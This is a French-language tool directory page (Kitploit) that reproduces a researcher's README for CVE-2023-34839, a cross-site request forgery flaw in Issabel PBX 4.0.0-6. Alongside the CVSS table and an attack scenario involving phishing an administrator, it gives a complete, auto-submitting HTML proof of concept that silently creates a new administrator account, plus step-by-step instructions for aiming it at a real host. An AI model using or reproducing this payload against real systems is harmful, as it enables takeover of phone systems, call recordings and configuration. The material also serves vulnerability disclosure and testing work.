Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-34839 — CVE-2023-34839 est une vulnérabilité de falsification de requête intersite (CSRF) découverte dans Issabel PBX version 4.0.0-6, une plateforme de communications unifiées open source largement utilisée. | Kitploit
Outils/GitHubGitHub/sahiloj/cve-2023-34839
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubsahiloj/cve-2023-34839

CVE-2023-34839

CVE-2023-34839 est une vulnérabilité de falsification de requête intersite (CSRF) découverte dans Issabel PBX version 4.0.0-6, une plateforme de communications unifiées open source largement utilisée.

Voir le dépôt
5310il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-34839 — Issabel PBX 4.0.0-6 : CSRF vers escalade de privilèges

CVE Severity CVSS Affected Version


Table des matières

  • Aperçu
  • Détails de la vulnérabilité
  • Logiciel affecté
  • Score CVSS
  • Scénario d'attaque
  • Preuve de concept (PoC)
  • Étapes pour reproduire
  • Impact
  • Remédiation
  • Références
  • Avertissement

Aperçu

CVE-2023-34839 est une vulnérabilité de Cross-Site Request Forgery (CSRF) découverte dans Issabel PBX version 4.0.0-6, une plateforme de communications unifiées open-source largement utilisée. La vulnérabilité réside dans le point de terminaison de gestion des utilisateurs et permet à un attaquant distant non authentifié de créer silencieusement un nouveau compte administrateur en trompant un administrateur actuellement authentifié pour qu'il visite une page web spécialement conçue.

ChampValeur
ID CVECVE-2023-34839
Date23 juin 2023
ChercheurSahil Ojha
FournisseurIssabel
ProduitIssabel PBX
Version4.0.0-6
Testé surWindows

Détails de la vulnérabilité

Issabel PBX 4.0.0-6 n'implémente pas de protections CSRF (par exemple, jetons de synchronisation, attributs de cookie SameSite ou validation des en-têtes Origin / Referer) sur le point de terminaison de création d'utilisateur :

POST /index.php?menu=userlist&action=new

Étant donné que l'application repose uniquement sur les cookies de session pour l'authentification et n'effectue aucune validation des requêtes modifiant l'état, une requête POST forgée provenant de n'importe quelle origine sera acceptée et traitée avec tous les privilèges de la session administrateur connectée.

Cause racine : Absence de validation de jeton anti-CSRF sur les points de terminaison administratifs modifiant l'état.

Classe de vulnérabilité : CWE-352 — Cross-Site Request Forgery (CSRF)


Logiciel affecté

LogicielVersionStatut
Issabel PBX4.0.0-6Vulnérable ✔
  • Page d'accueil du fournisseur : https://www.issabel.org/
  • Code source : https://github.com/IssabelFoundation/issabelPBX

Score CVSS

MétriqueValeur
Vecteur CVSS v3.1AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Score de base8.8 (Élevé)
Vecteur d'attaqueRéseau
Complexité d'attaqueFaible
Privilèges requisAucun
Interaction utilisateurRequise (visite admin)
PortéeInchangée
ConfidentialitéÉlevée
IntégritéÉlevée
DisponibilitéÉlevée

Scénario d'attaque

Un attaquant peut exploiter cette vulnérabilité en suivant ces grandes étapes :

  1. Créer une page HTML malveillante contenant un formulaire caché ciblant le point de terminaison de création d'utilisateur d'Issabel PBX avec des valeurs contrôlées par l'attaquant (nom d'utilisateur, mot de passe, groupe = administrateur).
  2. Héberger la page malveillante sur un serveur ou l'envoyer à l'administrateur cible via un e-mail de phishing, un message de chat ou tout vecteur d'ingénierie sociale.
  3. Attendre que l'administrateur ouvre le lien alors qu'il dispose d'une session active et authentifiée avec l'application Issabel PBX.
  4. Le navigateur soumet automatiquement le formulaire en utilisant le cookie de session existant de la victime, ce qui amène l'application à créer silencieusement un nouveau compte administrateur.
  5. L'attaquant se connecte avec les nouvelles identifiants créés et dispose d'un accès administrateur complet au système PBX, y compris le routage des appels, les enregistrements, la configuration des trunk SIP et tous les paramètres système.

Aucune interaction au-delà d'une simple visite de page n'est requise de la part de la victime.


Preuve de concept (PoC)

⚠️ Uniquement à des fins éducatives et de tests autorisés.
Remplacez localhost par le nom d'hôte ou l'adresse IP de l'instance Issabel PBX cible.
Si vous testez contre un point de terminaison https:// avec un certificat auto-signé, vous devez d'abord visiter l'URL cible dans le même navigateur et accepter l'avertissement de certificat ; sinon, le navigateur bloquera la soumission du formulaire cross-origin.

<html>
  <!-- CSRF Exploit — CVE-2023-34839 -->
  <body>
    <form action="https://localhost/index.php?menu=userlist&action=new" method="POST">
      <input type="hidden" name="save"             value="Save" />
      <input type="hidden" name="name"             value="CSRF" />
      <input type="hidden" name="description"      value="CSRF Test Account" />
      <input type="hidden" name="password1"        value="Test@123" />
      <input type="hidden" name="password2"        value="Test@123" />
      <input type="hidden" name="group"            value="1" />   <!-- 1 = Administrator -->
      <input type="hidden" name="extension"        value="" />
      <input type="hidden" name="webmailuser"      value="" />
      <input type="hidden" name="webmaildomain"    value="" />
      <input type="hidden" name="webmailpassword1" value="" />
      <input type="hidden" name="id_user"          value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Le fichier d'exploit est également disponible dans ce dépôt : CSRF Exploit.html


Étapes pour reproduire

Prérequis

  • Une instance Issabel PBX 4.0.0-6 en fonctionnement.
  • Un compte administrateur avec une session navigateur active.
  • Un navigateur sur la même machine que la session administrateur.

Étape 1 — Connectez-vous à Issabel PBX en tant qu'administrateur

Accédez à l'interface web d'Issabel PBX et connectez-vous avec les identifiants administrateur.

Issabel PBX Login


Étape 2 — Préparez l'exploit CSRF

Copiez le code HTML de la PoC ci-dessus et enregistrez-le sous forme de fichier .html, en remplaçant localhost par le nom d'hôte ou l'adresse IP réelle de l'instance Issabel cible.

L'exploit utilise des champs de formulaire cachés pour soumettre silencieusement une requête POST de création de nouvel utilisateur à l'application. Lorsque la page se charge, le JavaScript intégré soumet immédiatement le formulaire sans aucune action visible de l'utilisateur.

CSRF Exploit HTML


Télécharger l’outil